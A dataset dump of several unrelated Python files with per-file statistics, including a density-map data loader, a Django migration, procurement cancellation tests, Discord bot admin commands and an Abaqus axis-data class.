mask[mask>4]=0
target=target.copy()
k = 0
return img, target, k, mask
def load_data_dota_class_2(img_path,train = True):
while True:
try:
gt_path = img_path.replace('.png','.h5').replace('images','gt_density_map')
img = Image.open(img_path).convert('RGB')
torch.cuda.synchronize()
begin_time_test_7 = time.time()
gt_file = h5py.File(gt_path)
torch.cuda.synchronize()
end_time_test_7 = time.time()
run_time_7 = end_time_test_7 - begin_time_test_7
# print('该循环程序运行时间7:', run_time_7)
# mask_map = np.asarray(gt_file['mask'][()])
target = np.asarray(gt_file['density_map'][()][0:2,:,:])
mask = np.asarray(gt_file['mask'][()][0:2,:,:])
# k = np.asarray(gt_file['kpoint'][()])
break
except IOError:
cv2.waitKey(5)
img=img.copy()
mask=mask.copy()
mask[mask<=4]=1
mask[mask>4]=0
target=target.copy()
k = 0
return img, target, k, mask
| 28.68 | 88 | 0.53417 | 280 | 2,151 | 3.860714 | 0.217857 | 0.055504 | 0.066605 | 0.111008 | 0.880666 | 0.880666 | 0.880666 | 0.836263 | 0.836263 | 0.836263 | 0 | 0.030075 | 0.319851 | 2,151 | 74 | 89 | 29.067568 | 0.708818 | 0.105532 | 0 | 0.730769 | 0 | 0 | 0.048833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.115385 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a52d6499cfd9aad044569c36fe148fb4f7dcf117 | 101 | py | Python | examples/supervised/neuralnets+svm/datasets/__init__.py | sveilleux1/pybrain | 1e1de73142c290edb84e29ca7850835f3e7bca8b | [
"BSD-3-Clause"
] | 2,208 | 2015-01-02T02:14:41.000Z | 2022-03-31T04:45:46.000Z | examples/supervised/neuralnets+svm/datasets/__init__.py | sveilleux1/pybrain | 1e1de73142c290edb84e29ca7850835f3e7bca8b | [
"BSD-3-Clause"
] | 91 | 2015-01-08T16:42:16.000Z | 2021-12-11T19:16:35.000Z | examples/supervised/neuralnets+svm/datasets/__init__.py | sveilleux1/pybrain | 1e1de73142c290edb84e29ca7850835f3e7bca8b | [
"BSD-3-Clause"
] | 786 | 2015-01-02T15:18:20.000Z | 2022-02-23T23:42:40.000Z | from .datagenerator import generateNoisySines, generateGridData, generateClassificationData, plotData | 101 | 101 | 0.90099 | 7 | 101 | 13 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059406 | 101 | 1 | 101 | 101 | 0.957895 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
3c000b72b1c05ad2099080d37d73975ff58b2587 | 49 | py | Python | data_sets/__init__.py | OptimusPrimus/dcase2019_task1b | 321e10affd47ccecc9dd4d2d327e466481f457c9 | [
"MIT"
] | 8 | 2019-06-30T10:05:33.000Z | 2022-01-09T20:40:05.000Z | data_sets/__init__.py | OptimusPrimus/dcase2019_task1b | 321e10affd47ccecc9dd4d2d327e466481f457c9 | [
"MIT"
] | null | null | null | data_sets/__init__.py | OptimusPrimus/dcase2019_task1b | 321e10affd47ccecc9dd4d2d327e466481f457c9 | [
"MIT"
] | 3 | 2019-11-06T19:06:53.000Z | 2020-06-09T16:01:50.000Z | from data_sets.dcase20191b import SpecDCASE20191b | 49 | 49 | 0.918367 | 6 | 49 | 7.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217391 | 0.061224 | 49 | 1 | 49 | 49 | 0.73913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3c77f9fc6fecb86ec19822b319be75f0e266e35f | 1,959 | py | Python | aether/forum/migrations/0007_auto_20210616_2216.py | katajakasa/aetherguild4 | a7e294f0cff11e2508751f1013e6648fdc56bb94 | [
"MIT"
] | null | null | null | aether/forum/migrations/0007_auto_20210616_2216.py | katajakasa/aetherguild4 | a7e294f0cff11e2508751f1013e6648fdc56bb94 | [
"MIT"
] | 1 | 2021-06-10T17:36:11.000Z | 2021-06-10T17:36:11.000Z | aether/forum/migrations/0007_auto_20210616_2216.py | katajakasa/aetherguild4 | a7e294f0cff11e2508751f1013e6648fdc56bb94 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.4 on 2021-06-16 19:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('forum', '0006_forumpost_attached_gallery'),
]
operations = [
migrations.AlterField(
model_name='bbcodeimage',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumboard',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumlastread',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumpost',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumpostedit',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumsection',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumthread',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumuser',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 36.277778 | 111 | 0.607963 | 197 | 1,959 | 5.86802 | 0.233503 | 0.083045 | 0.17301 | 0.200692 | 0.763841 | 0.763841 | 0.763841 | 0.763841 | 0.763841 | 0.763841 | 0 | 0.013333 | 0.272588 | 1,959 | 53 | 112 | 36.962264 | 0.797895 | 0.022971 | 0 | 0.680851 | 1 | 0 | 0.08159 | 0.016213 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021277 | 0 | 0.085106 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b1b96f903eb59e2d73af945bc612aac2cfb887de | 349 | py | Python | preprocess_main.py | RayonSL/Competition | eafc914f3cc0af394cfc1aed0769a1afac044680 | [
"Apache-2.0"
] | 2 | 2019-10-31T02:15:09.000Z | 2020-01-14T10:41:04.000Z | preprocess_main.py | RayonSL/Competition | eafc914f3cc0af394cfc1aed0769a1afac044680 | [
"Apache-2.0"
] | null | null | null | preprocess_main.py | RayonSL/Competition | eafc914f3cc0af394cfc1aed0769a1afac044680 | [
"Apache-2.0"
] | null | null | null | # from preprocess import extract_image_and_label
# from preprocess import train_val_split
# from preprocess import generate_test_a
# from preprocess import generate_round1_normal
# from preprocess import merge_train_with_round1_normal
from preprocess import generate_round1_full_train
from preprocess import merge_train_with_round1_normal_full_train | 49.857143 | 64 | 0.893983 | 50 | 349 | 5.8 | 0.36 | 0.337931 | 0.482759 | 0.289655 | 0.572414 | 0.317241 | 0.317241 | 0.317241 | 0 | 0 | 0 | 0.012618 | 0.091691 | 349 | 7 | 64 | 49.857143 | 0.902208 | 0.641834 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
5903871c8539aa25127c2cad257d066fc9a4ac7e | 12,338 | py | Python | src/openprocurement/tender/openua/tests/cancellation_blanks.py | scrubele/prozorro-testing | 42b93ea2f25d8cc40e66c596f582c7c05e2a9d76 | [
"Apache-2.0"
] | null | null | null | src/openprocurement/tender/openua/tests/cancellation_blanks.py | scrubele/prozorro-testing | 42b93ea2f25d8cc40e66c596f582c7c05e2a9d76 | [
"Apache-2.0"
] | 2 | 2021-03-25T23:27:04.000Z | 2022-03-21T22:18:15.000Z | src/openprocurement/tender/openua/tests/cancellation_blanks.py | scrubele/prozorro-testing | 42b93ea2f25d8cc40e66c596f582c7c05e2a9d76 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# TenderCancellationResourceTest
import mock
from datetime import timedelta
from openprocurement.api.utils import get_now
@mock.patch(
"openprocurement.tender.core.models.RELEASE_2020_04_19",
get_now() + timedelta(days=1)
)
def create_tender_cancellation(self):
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason"}},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
self.assertIn("date", cancellation)
self.assertEqual(cancellation["reasonType"], "cancelled")
self.assertEqual(cancellation["reason"], "cancellation reason")
self.assertIn("id", cancellation)
self.assertIn(cancellation["id"], response.headers["Location"])
response = self.app.get("/tenders/{}".format(self.tender_id))
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["status"], "active.tendering")
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason", "reasonType": "unFixable"}},
status=422
)
self.assertEqual(response.status, "422 Unprocessable Entity")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(
response.json["errors"],
[
{
u"description": [u"Value must be one of %s" % ["cancelled", "unsuccessful"]],
u"location": u"body",
u"name": u"reasonType",
}
],
)
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason", "status": "active", "reasonType": "unsuccessful"}},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
self.assertEqual(cancellation["reasonType"], "unsuccessful")
self.assertEqual(cancellation["reason"], "cancellation reason")
self.assertEqual(cancellation["status"], "active")
self.assertIn("id", cancellation)
self.assertIn(cancellation["id"], response.headers["Location"])
response = self.app.get("/tenders/{}".format(self.tender_id))
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["status"], "cancelled")
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason"}},
status=403,
)
self.assertEqual(response.status, "403 Forbidden")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(
response.json["errors"][0]["description"], "Can't update tender in current (cancelled) status"
)
@mock.patch(
"openprocurement.tender.core.models.RELEASE_2020_04_19",
get_now() + timedelta(days=1)
)
def patch_tender_cancellation(self):
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason"}},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
old_date_status = response.json["data"]["date"]
response = self.app.patch_json(
"/tenders/{}/cancellations/{}?acc_token={}".format(self.tender_id, cancellation["id"], self.tender_token),
{"data": {"reasonType": "unsuccessful"}},
)
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["reasonType"], "unsuccessful")
response = self.app.patch_json(
"/tenders/{}/cancellations/{}?acc_token={}".format(self.tender_id, cancellation["id"], self.tender_token),
{"data": {"status": "active"}},
)
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["status"], "active")
self.assertNotEqual(old_date_status, response.json["data"]["date"])
response = self.app.get("/tenders/{}".format(self.tender_id))
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["status"], "cancelled")
response = self.app.patch_json(
"/tenders/{}/cancellations/{}?acc_token={}".format(self.tender_id, cancellation["id"], self.tender_token),
{"data": {"status": "pending"}},
status=403,
)
self.assertEqual(response.status, "403 Forbidden")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(
response.json["errors"][0]["description"], "Can't update tender in current (cancelled) status"
)
response = self.app.patch_json(
"/tenders/{}/cancellations/some_id?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"status": "active"}},
status=404,
)
self.assertEqual(response.status, "404 Not Found")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["status"], "error")
self.assertEqual(
response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"cancellation_id"}]
)
response = self.app.patch_json("/tenders/some_id/cancellations/some_id", {"data": {"status": "active"}}, status=404)
self.assertEqual(response.status, "404 Not Found")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["status"], "error")
self.assertEqual(
response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}]
)
response = self.app.get("/tenders/{}/cancellations/{}".format(self.tender_id, cancellation["id"]))
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["status"], "active")
self.assertEqual(response.json["data"]["reason"], "cancellation reason")
# TenderAwardsCancellationResourceTest
@mock.patch(
"openprocurement.tender.core.models.RELEASE_2020_04_19",
get_now() + timedelta(days=1)
)
def cancellation_active_award(self):
self.app.authorization = ("Basic", ("auction", ""))
response = self.app.get("/tenders/{}/auction".format(self.tender_id))
auction_bids_data = response.json["data"]["bids"]
for i in self.initial_lots:
response = self.app.post_json(
"/tenders/{}/auction/{}".format(self.tender_id, i["id"]), {"data": {"bids": auction_bids_data}}
)
self.app.authorization = ("Basic", ("token", ""))
response = self.app.get("/tenders/{}/awards".format(self.tender_id))
award_id = [
i["id"] for i in response.json["data"] if i["status"] == "pending" and i["lotID"] == self.initial_lots[0]["id"]
][0]
response = self.app.patch_json(
"/tenders/{}/awards/{}?acc_token={}".format(self.tender_id, award_id, self.tender_token),
{"data": {"status": "active", "qualified": True, "eligible": True}},
)
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{
"data": {
"reason": "cancellation reason",
"status": "active",
"cancellationOf": "lot",
"relatedLot": self.initial_lots[0]["id"],
}
},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
self.assertEqual(cancellation["reason"], "cancellation reason")
self.assertEqual(cancellation["status"], "active")
self.assertIn("id", cancellation)
self.assertIn(cancellation["id"], response.headers["Location"])
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason", "status": "active"}},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
self.assertEqual(cancellation["reason"], "cancellation reason")
self.assertEqual(cancellation["status"], "active")
self.assertIn("id", cancellation)
self.assertIn(cancellation["id"], response.headers["Location"])
@mock.patch(
"openprocurement.tender.core.models.RELEASE_2020_04_19",
get_now() + timedelta(days=1)
)
def cancellation_unsuccessful_award(self):
self.app.authorization = ("Basic", ("auction", ""))
response = self.app.get("/tenders/{}/auction".format(self.tender_id))
auction_bids_data = response.json["data"]["bids"]
for i in self.initial_lots:
response = self.app.post_json(
"/tenders/{}/auction/{}".format(self.tender_id, i["id"]), {"data": {"bids": auction_bids_data}}
)
self.app.authorization = ("Basic", ("token", ""))
response = self.app.get("/tenders/{}/awards".format(self.tender_id))
award_id = [
i["id"] for i in response.json["data"] if i["status"] == "pending" and i["lotID"] == self.initial_lots[0]["id"]
][0]
response = self.app.patch_json(
"/tenders/{}/awards/{}?acc_token={}".format(self.tender_id, award_id, self.tender_token),
{"data": {"status": "unsuccessful"}},
)
response = self.app.get("/tenders/{}/awards".format(self.tender_id))
award_id = [
i["id"] for i in response.json["data"] if i["status"] == "pending" and i["lotID"] == self.initial_lots[0]["id"]
][0]
response = self.app.patch_json(
"/tenders/{}/awards/{}?acc_token={}".format(self.tender_id, award_id, self.tender_token),
{"data": {"status": "unsuccessful"}},
)
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{
"data": {
"reason": "cancellation reason",
"status": "active",
"cancellationOf": "lot",
"relatedLot": self.initial_lots[0]["id"],
}
},
status=403,
)
self.assertEqual(response.status, "403 Forbidden")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["errors"][0]["description"],
"Can't perform cancellation if all awards are unsuccessful")
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason", "status": "active"}},
status=403,
)
self.assertEqual(response.status, "403 Forbidden")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["errors"][0]["description"],
"Can't perform cancellation if all awards are unsuccessful")
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{
"data": {
"reason": "cancellation reason",
"status": "active",
"cancellationOf": "lot",
"relatedLot": self.initial_lots[1]["id"],
}
},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
self.assertEqual(cancellation["reason"], "cancellation reason")
self.assertEqual(cancellation["status"], "active")
self.assertIn("id", cancellation)
self.assertIn(cancellation["id"], response.headers["Location"])
| 42.544828 | 120 | 0.647836 | 1,353 | 12,338 | 5.791574 | 0.083518 | 0.124426 | 0.158499 | 0.064319 | 0.924962 | 0.92075 | 0.908754 | 0.891271 | 0.889612 | 0.889612 | 0 | 0.012608 | 0.177176 | 12,338 | 289 | 121 | 42.692042 | 0.759259 | 0.007213 | 0 | 0.708661 | 0 | 0 | 0.277174 | 0.079461 | 0 | 0 | 0 | 0 | 0.30315 | 1 | 0.015748 | false | 0 | 0.011811 | 0 | 0.027559 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
593bcc3574fcbe5a25a726cc6e8190a9b7246ca4 | 3,372 | py | Python | commands/admincmds.py | DwarflinDeveloping/Linker | d97161b2fd202dc6189482b344846e9377aee4a1 | [
"MIT"
] | 1 | 2021-03-24T12:28:12.000Z | 2021-03-24T12:28:12.000Z | commands/admincmds.py | DwarflinDeveloping/Linker | d97161b2fd202dc6189482b344846e9377aee4a1 | [
"MIT"
] | 5 | 2021-03-26T15:05:30.000Z | 2022-02-05T18:21:23.000Z | commands/admincmds.py | DwarflinDeveloping/Linker | d97161b2fd202dc6189482b344846e9377aee4a1 | [
"MIT"
] | 3 | 2021-03-26T15:06:58.000Z | 2022-02-05T19:00:16.000Z | administrators = [784473264755834880]
operators = [784473264755834880]
paused = False
async def pause(ctx, client):
from embeds import create_custom_embed
from discord import Colour
if ctx.author.id != 784473264755834880:
embed = create_custom_embed(
embed_message="You are not permitted to close the bot!",
user=ctx.author,
colour=Colour.dark_red()
)
await ctx.send(embed=embed)
return
global paused
if paused:
await ctx.send(
embed=create_custom_embed(
embed_message="I stopped my pause.",
user=ctx.author,
colour=Colour.dark_green()
)
)
paused = False
return
confirmation_message = await ctx.send(
embed=create_custom_embed(
embed_title="Confirmation",
embed_message="You're about to pause me. Do you really want to continue this process?",
user=ctx.author,
colour=Colour.blue()
)
)
from utils import ReturnCodes, get_confirmation
confirmation = await get_confirmation(confirmation_message, ctx.author, client)
if confirmation == ReturnCodes.SUCCESS:
await ctx.send(
embed=create_custom_embed(
embed_message="I paused. Until you repeat this command, I will not answer any requests.",
user=ctx.author,
colour=Colour.dark_green()
)
)
paused = True
elif confirmation == ReturnCodes.CANCELLED:
await confirmation_message.delete()
elif confirmation == ReturnCodes.TIMEOUT_ERROR:
await confirmation_message.delete()
elif confirmation == ReturnCodes.OTHER_ERROR:
from embeds import handle_error
await ctx.send(handle_error(confirmation, ctx.author))
async def shutdown(ctx, client):
from embeds import create_custom_embed
from discord import Colour
if ctx.author.id != 784473264755834880:
embed = create_custom_embed(
embed_message="You are not permitted to close the bot!",
user=ctx.author,
colour=Colour.dark_red()
)
await ctx.send(embed=embed)
return
confirmation_message = await ctx.send(
embed=create_custom_embed(
embed_title="Confirmation",
embed_message="You're about to shut me down. Do you really want to continue this process?",
user=ctx.author,
colour=Colour.blue()
)
)
from utils import ReturnCodes, get_confirmation
confirmation = await get_confirmation(confirmation_message, ctx.author, client)
if confirmation == ReturnCodes.SUCCESS:
await ctx.send(
embed=create_custom_embed(
embed_message="I try to switch off. Please note the console for possible errors..",
user=ctx.author,
colour=Colour.dark_green()
)
)
await client.close()
elif confirmation == ReturnCodes.CANCELLED:
await confirmation_message.delete()
elif confirmation == ReturnCodes.TIMEOUT_ERROR:
await confirmation_message.delete()
elif confirmation == ReturnCodes.OTHER_ERROR:
from embeds import handle_error
await ctx.send(handle_error(confirmation, ctx.author))
| 33.058824 | 105 | 0.631376 | 366 | 3,372 | 5.674863 | 0.229508 | 0.056331 | 0.073664 | 0.074145 | 0.864227 | 0.864227 | 0.864227 | 0.847857 | 0.80934 | 0.80934 | 0 | 0.030278 | 0.294781 | 3,372 | 101 | 106 | 33.386139 | 0.843146 | 0 | 0 | 0.715909 | 0 | 0 | 0.119514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a71aea54d1f6cdc8f602a580003229dfda0b53f1 | 169 | py | Python | settings/__init__.py | satdav/mozillians | 97d764f68d930275c1d722ba21c40ec2a963491d | [
"BSD-3-Clause"
] | null | null | null | settings/__init__.py | satdav/mozillians | 97d764f68d930275c1d722ba21c40ec2a963491d | [
"BSD-3-Clause"
] | null | null | null | settings/__init__.py | satdav/mozillians | 97d764f68d930275c1d722ba21c40ec2a963491d | [
"BSD-3-Clause"
] | null | null | null | from funfactory.settings_base import *
from settings.initial import *
from settings.default import *
try:
from settings.local import *
except ImportError:
pass
| 18.777778 | 38 | 0.769231 | 21 | 169 | 6.142857 | 0.571429 | 0.27907 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171598 | 169 | 8 | 39 | 21.125 | 0.921429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.142857 | 0.714286 | 0 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
a71d20418aba98291168553902e547019802c4d4 | 16,120 | py | Python | src/abaqus/XY/AxisData.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | 7 | 2022-01-21T09:15:45.000Z | 2022-02-15T09:31:58.000Z | src/abaqus/XY/AxisData.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | src/abaqus/XY/AxisData.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | from abaqusConstants import *
from .QuantityType import QuantityType
from .XYCurveArray import XYCurveArray
class AxisData:
"""The AxisData object is used to store the data attributes of axes. An AxisData object is
automatically created when creating an Axis object.
Attributes
----------
dbReference: float
A Float specifying the reference value for decibel computation. The default value is
1.0.
direction: SymbolicConstant
A SymbolicConstant specifying the direction of the axis. Possible values are ABSCISSA
and ORDINATE.
labelFormat: SymbolicConstant
A SymbolicConstant specifying how tick labels are formatted. Possible values are
AUTOMATIC, DECIMAL, SCIENTIFIC, and ENGINEERING. The default value is AUTOMATIC.
labelNumDigits: int
An Int specifying the number of significant digits displayed for the labels. Possible
values are 1 to 7. The default value is 2.
maxAutoCompute: Boolean
A Boolean specifying whether or not to use the automatically computed maximum value for
the axis. The default value is ON.
maxAutoValue: float
A Float specifying the maximum value when **maxAutoCompute** is true.
maxValue: float
A Float specifying the maximum value when **maxAutoCompute** is false. By default,
**maxValue** is set to **maxAutoValue**.
maxShownValue: float
A Float specifying the current maximum value displayed for this axis. This value is
different from **maxAutoValue** or **maxValue** when the axis is being transformed (zoom or
pan).
minAutoCompute: Boolean
A Boolean specifying whether or not to use the automatically computed minimum value for
the axis. The default value is ON.
minAutoValue: float
A Float specifying the minimum value when **minAutoCompute** is true.
minValue: float
A Float specifying the minimum value when **minAutoCompute** is false. By default,
**minValue** is set to **minAutoValue**.
minShownValue: float
A Float specifying the current minimum value displayed for this axis. This value is
different from **minAutoValue** or **minValue** when the axis is being transformed (zoom or
pan).
minorTickCount: int
An Int specifying the number the number of minor tick marks between major ticks.
Possible values are 0 ≤≤ **minorTickCount** ≤≤ 20. When the **scale** is set to LOG, the
minorTickCount is interpreted as the number of ticks per decade and limited to 0, 1, 4,
8, and 17. The default value is 1.
scale: SymbolicConstant
A SymbolicConstant specifying the type of scale to use for the axis. Possible values
are:LINEAR, specifying tickmarks and labels are linearly distributed.LOG, specifying
tickmarks and labels are logarithmically distributed.DB, specifying tickmarks and labels
are distributed on a decibel scale.DB2, specifying tickmarks and labels are distributed
on a 2*decibel scale.The default value is LINEAR.
tickMode: SymbolicConstant
A SymbolicConstant specifying the type of scale to use for the axis. Possible values
are:AUTOCOMPUTE, specifying tickmarks and labels are automatically computed.INCREMENT,
specifying tickmarks and labels are defined by a given increment.TOTAL_NUMBER,
specifying tickmarks and labels are defined by the total number of ticks.The default
value is AUTOCOMPUTE.
tickCount: int
An Int specifying the number of major tick marks on the axis when **tickMode**
=TOTAL_NUMBER. Possible values are 0 ≤≤ **tickCount** ≤≤ 30. The default value is computed
based on the range of the axis. When the **scale** is set to LOG, the tickCount is
interpreted as the number of ticks per decade and acceptable values are 1, 4, 8, and 17.
tickCountShown: int
An Int specifying the number of major ticks effectively shown. This value takes zoom,
pan and rounding into account.
tickIncrement: float
A Float specifying the increment of the major tick marks on the axis when **tickMode** =
INCREMENT. Valid values are 0 << **tickIncrement**. The default value is computed based on
the results of the automatic method and the range being plotted. When the **scale** is set
to LOG, the tickIncrement is interpreted as a value per decade and should be between
0.05 and 1.
tickIncrementShown: float
A Float specifying the shown tick increment of the major ticks. This value takes
zoom/pan into account.
useSystemTitle: Boolean
A Boolean specifying whether the title to use for the axis title is system defined or
user defined. The default value is ON.
curves: XYCurveArray
An :py:class:`~abaqus.XY.XY:py:class:`~.Curve`Array.XY:py:class:`~.Curve`Array` object specifying a read-only sequence of :py:class:`~.Curve` objects associated to
this axis.
quantityType: QuantityType
A :py:class:`~abaqus.XY.QuantityType.QuantityType` object specifying the quantity type: i.e. the physical dimension and
associated label of the data represented by this axis.
tickValues: float
A tuple of Floats specifying the read-only major tick values shown.
tickLabels: tuple
A tuple of Strings specifying the read-only major tick labels shown.
systemTitle: str
A String specifying the system title. The system title is based on the **quantityType** of
the axis and associated curves.
title: str
A String specifying the title of the axis. By default, the title is set to the
**systemTitle**.
Notes
-----
This object can be accessed by:
.. code-block:: python
import visualization
session.charts[name].axes1[i].axisData
session.charts[name].axes2[i].axisData
session.defaultChartOptions.defaultAxis1Options.axisData
session.defaultChartOptions.defaultAxis2Options.axisData
session.xyPlots[name].charts[name].axes1[i].axisData
session.xyPlots[name].charts[name].axes2[i].axisData
"""
# A Float specifying the reference value for decibel computation. The default value is
# 1.0.
dbReference: float = 1
# A SymbolicConstant specifying the direction of the axis. Possible values are ABSCISSA
# and ORDINATE.
direction: SymbolicConstant = None
# A SymbolicConstant specifying how tick labels are formatted. Possible values are
# AUTOMATIC, DECIMAL, SCIENTIFIC, and ENGINEERING. The default value is AUTOMATIC.
labelFormat: SymbolicConstant = AUTOMATIC
# An Int specifying the number of significant digits displayed for the labels. Possible
# values are 1 to 7. The default value is 2.
labelNumDigits: int = 2
